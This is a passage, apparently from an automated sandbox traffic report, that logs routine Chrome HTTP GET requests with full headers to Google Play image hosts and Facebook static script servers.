CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://play.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /tWCdgpyyKxpkE24hVTjbnXYwTjEmt_dTTn9v4WK08-ku0TAqYxR8D91sNZCx4RQCuyxj=w526-h296-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://play.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3iH-D4/yD/l/en_GB/kIGqHY8H8ti.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yW/r/ypejlg-I21y.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yC/r/udpNONeEc85.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3ievD4/yP/l/en_GB/-F9g11XP17c.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3imlR4/y0/l/en_GB/JAH0JDr9qF3.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/y3/r/Ja35YE72DAb.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /XRDaSYtkE4CmnsfdfgH7CGPmqCDJmeu-h1_J0qwXeHn5yu4NpZWyGRN60yDRYS_wVwg=s48-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /XRDaSYtkE4CmnsfdfgH7CGPmqCDJmeu-h1_J0qwXeHn5yu4NpZWyGRN60yDRYS_wVwg=w240-h480-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /gUNwuhSI8pm3Bx_rl10RAROBMUVhixQ8Ci4_omoM4ttlN007sZ3ILduAZFboEu8Kzkg=w526-h296-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /1YVfPMu-xnQmXy6NDTtqeQiXL2jYZZc79TZbrenrA6XsdhCcyT53UlJQltFNFXXH0G0=w526-h296-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://play.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /EJpSmrjgF0pNb3uY7ITLZ-4gtePSnRB9jXV3r-x_HBTIcm3MZ0s6GZzoPiV7OklNBA=w526-h296-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /y31huOOtAOdrHKqwhl-h_w0UxIvSBfpTJmipcUjaZcc4MXi69pm2ydqvnZWNFZijh5kX=w526-h296-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /L4G1Qonz3vmIv5d5fD6sF7P5_hHrjbPSMdNGcV7PuYhT7KGKmPp3es6EI0XpQaa7WIA=w526-h296-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://play.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /V9eV8_8k5ssFM3cD8eA0oIYP-1mOekwcCFsH5cEWoOLvJ8EmUJYFRkdwg1d-lc1s9Q=w526-h296-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3iCwx4/yZ/l/en_GB/HZi4Ht9U6gq.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yE/r/1rYlRSL7ILQ.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3ivAx4/yo/l/en_GB/48NDuq1PGrS.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3iMX84/yc/l/en_GB/JXFTcdEOgst.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3iO_y4/y8/l/en_GB/81PfJWE3AVG.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3iMyQ4/yx/l/en_GB/yUeQb7xXYnw.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3iwp84/yz/l/en_GB/yH3NmCM2cz1.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yL/r/2KW45SaLwT9.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yr/r/P-sBcB8ct1C.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3iPiP4/ye/l/en_GB/V4hH0O2u6X-.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /fkZeS0WFB9F7eek_vtduoMGNd8Ok5LnjRAGCvmrdxk7U4_6SuAyxMo86c71zL7WzoC0=w526-h296-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://play.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /Bu3S5bBEAvad3fOA-pOpNRIOOM970zCAK8IG1anxUgfrRRbvNWICtFr19O_BHZIjlo8=w526-h296-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://play.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wENQzf4cxxI_LJZ-rHMq-ZERLLQwqY2E8FjSPOToA9rL_NvYoBT7KJf94cZB7TooZvk=w526-h296-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://play.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yC/r/udpNONeEc85.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /LW7xh2wtB12g50iQvEER_zZTcY4OLuT4PV-RhN2ums0B65opMFwcHdELAmXECB2CrGpM=w526-h296-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://play.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /J9k_4JjLDkXrp_571RkxZLMjle3uV-KAmLxET5B8zcS5XXgeWLNIBS6y2khRQrpVN6Z3=w526-h296-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://play.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /-2j2BAdv613PP-EaFA-H9Oczwgljn4rRgotfLmIYMLIMRp3p_bG7gQIfBCXk1m_wiRQ=w526-h296-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://play.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /vp/mp4/1280x720/KHfEG-2pIEI.mp4 HTTP/1.1Host: play-games.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept-Encoding: identity;q=1, *;q=0sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: videoReferer: https://play.google.com/Accept-Language: en-US,en;q=0.9Range: bytes=0-
    Source: global trafficHTTP traffic detected: GET /lhOWWzCnzrwdIVTnQp4DyhzTpAFaB17XQIFVhfZcOVDfZzJQKUEV9QmDMbxkiRiqM6Q=w526-h296-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
